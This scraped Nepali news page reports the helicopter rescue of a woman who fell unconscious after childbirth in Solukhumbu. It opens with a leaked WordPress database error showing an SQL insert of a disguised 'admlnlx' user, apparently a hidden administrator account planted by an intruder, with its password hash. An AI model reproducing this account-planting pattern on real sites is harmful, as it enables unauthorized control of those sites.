WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoUBdWdzSckWF2YKpMyIY9xiz/OwAi1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 23:18:11', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बु नेचासल्यान गाउँपालिकाबाट एक सुत्केरी महिलाको उद्धार गरिएकोे छ ।अचेत अवस्थामा रहेकी वडा नम्बर ५ की २४ बर्षीया प्रतिमा राईलाई हेलिकप्टर मार्फत उद्धार गरि काठमाण्डौँ पठाएको गाउँपालिका स्वास्थ्य शाखा संयोजक युवराज शर्माले जानकारी दिए ।
उनका अनुसार बिहिबार विहान ६ बजे बेतघारी स्वास्थ्य चौकीको बर्थिङ सेन्टरमा शिशु छोरालाई सकुशल जन्म दिएकी राई एक्कासी बेहोस भएपछि आज दिउँसो २ बजे उद्धार गरिएको हो । राष्ट्रपति महिला उत्थान कार्यक्रम मार्फत उद्धार गरिएको उनको प्रसुति गृह थापाथली काठमाण्डौँमा उपचार भईरहेको बताएको छ ।
शिशुको अवस्था सामान्य रहेको छ भने आमाको शरिरमा रगतको मात्रा अत्यन्त कम रहेको अस्पतालले जनाएको छ ।